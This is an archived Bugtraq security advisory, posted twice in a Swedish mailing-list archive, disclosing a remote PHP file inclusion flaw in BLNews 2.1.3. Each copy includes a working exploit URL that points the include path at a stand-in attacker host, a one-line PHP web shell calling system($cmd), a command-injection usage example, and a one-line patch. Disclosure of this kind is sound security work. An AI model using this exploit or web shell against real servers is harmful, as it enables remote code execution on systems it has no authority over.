linux, säkerhet

102533 2003-05-24  18:58  /43 rader/ Over_G <overg@mail.ru>
Importerad: 2003-05-24  18:58  av Brevbäraren
Extern mottagare: BugTraq@securityfocus.com
Externa svar till: overg@mail.ru
Mottagare: Bugtraq (import) <5006>
Ärende: PHP source code injection in BLNews
------------------------------------------------------------
Product: BLNews
Version: 2.1.3
OffSite: http://www.blnews.de/
Problem: PHP source code injection
--------------------------------------------

Vulnerability:

------------admin/objects.inc.php4------------

if ($itheme!="blubb")
{ include("$Server[path]/admin/tools.inc.php4"); }
include("$Server[path]/admin/$Server[language_file]");

-----------------------------------------------------

The developers forgot write include("server.inc.php4") :)

Exploit:
admin/objects.inc.php4?Server[path]=http://ATACKER&Server[language_file]=cmd.php4
with http://ATACKER/admin/tools.inc.php4 http://ATACKER/admin/cmd.php4

with
<? system($cmd) ?>

Use: objects.inc.php4?Server[path]=http://ATACKER&cmd=id;uname -a;pwd;

Patch.
write before line        if ($itheme!="blubb")
include("server.inc.php4");



Contacts: www.overg.com www.dwcgr0up.com
irc.irochka.net #DWC
overg@mail.ru


regards, Over G[DWC Gr0up]
(102533) /Over_G <overg@mail.ru>/---------(Ombruten)
102539 2003-05-24  22:04  /43 rader/ Over_G <overg@mail.ru>
Importerad: 2003-05-24  22:04  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: overg@mail.ru
Mottagare: Bugtraq (import) <5012>
Ärende: PHP source code injection in BLNews
------------------------------------------------------------
Product: BLNews
Version: 2.1.3
OffSite: http://www.blnews.de/
Problem: PHP source code injection
--------------------------------------------

Vulnerability:

------------admin/objects.inc.php4------------

if ($itheme!="blubb")
{ include("$Server[path]/admin/tools.inc.php4"); }
include("$Server[path]/admin/$Server[language_file]");

-----------------------------------------------------

The developers forgot write include("server.inc.php4") :)

Exploit:
admin/objects.inc.php4?Server[path]=http://ATACKER&Server[language_file]=cmd.php4
with http://ATACKER/admin/tools.inc.php4 http://ATACKER/admin/cmd.php4

with
<? system($cmd) ?>

Use: objects.inc.php4?Server[path]=http://ATACKER&cmd=id;uname -a;pwd;

Patch.
write before line        if ($itheme!="blubb")
include("server.inc.php4");



Contacts: www.overg.com www.dwcgr0up.com
irc.irochka.net #DWC
overg@mail.ru


regards, Over G[DWC Gr0up]
(102539) /Over_G <overg@mail.ru>/---------(Ombruten)